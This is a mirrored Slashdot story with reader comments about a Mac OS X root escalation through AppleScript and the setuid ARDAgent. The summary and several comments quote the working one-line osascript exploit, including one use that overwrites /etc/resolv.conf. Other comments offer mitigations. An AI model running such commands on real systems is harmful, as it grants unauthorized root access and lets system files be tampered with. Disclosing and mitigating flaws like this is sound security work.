Slashdot Mirror

← Back to Stories (view on slashdot.org)

Mac OS X Root Escalation Through AppleScript

Posted by timothy on from the oh-snap-crispy-apples dept.

An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.

8 of 359 comments (clear)

  1. ARDAgent is Apple Remote Desktop by dch24 · · Score: 5, Informative

    ARD = Apple Remote Desktop You can remove it by following these instructions.

  2. Re:Physical access? by Medieval_Gnome · · Score: 5, Informative

    This does not work over ssh, at least not if you user isn't also logged in physically to the machine. If you try over ssh, it gives the error

    _RegisterApplication(), FAILED TO establish the default connection to the WindowServer, _CGSDefaultConnection() is NULL.

    However, it does work if you have a remote desktop view into a machine.

    --

    :wq

  3. Re:Only need a shell.... by pudge · · Score: 5, Informative

    Many people have sshd running as well, so it doesn't quite have to be local. Just need a shell.


    Verified, on my Leopard box. SSH'ed to it and rooted it (I was able to touch a file in a root-only directory)

    Nope. You cannot do it via SSH unless that account is already logged in physically, at the console.

    [pudge@bourque ~]$ ls -l /etc/test1
    ls: /etc/test1: No such file or directory
    [pudge@bourque ~]$ touch /etc/test1
    touch: /etc/test1: Permission denied
    [pudge@bourque ~]$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/test1"'
    [pudge@bourque ~]$ ls -l /etc/test1
    -rw-rw-rw- 1 root wheel 0 Jun 18 11:27 /etc/test1
    versus:

    [pudge@bourque ~]$ ssh maintenance@localhost
    bourque:~ maintenance$ ls -l /etc/test2
    ls: /etc/test2: No such file or directory
    bourque:~ maintenance$ touch /etc/test2
    touch: /etc/test2: Permission denied
    bourque:~ maintenance$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/test2"'
    _RegisterApplication(), FAILED TO establish the default connection to the WindowServer, _CGSDefaultConnection() is NULL.
  4. Re:Quick Question by Charles+Dodgeson · · Score: 5, Informative

    I've got it to run destructive things as an ordinary user without any need for authentication beyond being logged in

    % osascript -e 'tell app "ARDAgent" to do shell script "echo Nasty Content > /etc/resolv.conf"' % cat /etc/resolv.conf
    Nasty Content
    --
    Prime numbers are exactly what Alan Greenspan says they are -S. Minsky
  5. Recipe for neutralizing it by goombah99 · · Score: 5, Informative

    Here's a non-destructive way to neutralize it.

    cd /System/Library/CoreServices/RemoteManagement/

    sudo tar -czf ARDAgent.app.gz ARDAgent.app

    sudo chmod 600 ARDAgent.app.gz

    This simply hides it in an unreadable tarball.

    --
    Some drink at the fountain of knowledge. Others just gargle.
    1. Re:Recipe for neutralizing it by patrick42 · · Score: 5, Informative

      Or more simply:

      chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

      After doing that, I get:

      patrick@picasso:~$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
      patrick

      (Repairing permissions will probably reset this though.)

    2. Re:Recipe for neutralizing it by Kadin2048 · · Score: 5, Informative

      No, GP was correct. On Mac OS X, ".app" means an application bundle ... which is a directory, not a file.

      If you try to gzip an application bundle without putting it in a tarball first, you'll just get a "foo.app/ is a directory; ignored" error.

      It's confusing because the Finder doesn't treat application bundles like normal directories, but that's what they are to the filesystem and *nix utilities.

      --
      "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
  6. Fix using Info.plist by jediknil · · Score: 5, Informative

    This may have come too late in the comments for anyone to see it, but if the exploit is active on your system, adding a key to ARDAgent's Info.plist makes the problem go away without disabling ARDAgent altogether. (Whether or not ARDAgent is a security vulnerability itself is another story.)

    <key>NSAppleScriptEnabled</key>
    <string>YES</string>

    That "YES" is not a typo; setting it to "NO" does not fix the problem. AFAICT this makes osascript expect that ARDAgent will implement more of its own AppleScript handlers...which of course, it doesn't.

    P.S. I searched for other, similar problem setuid apps, and turned up check_afp.app (which someone else posted already) and, surprisingly, GoogleUpdaterInstaller. Fortunately, even though these apps run setuid, they won't respond to the "do shell script" attack.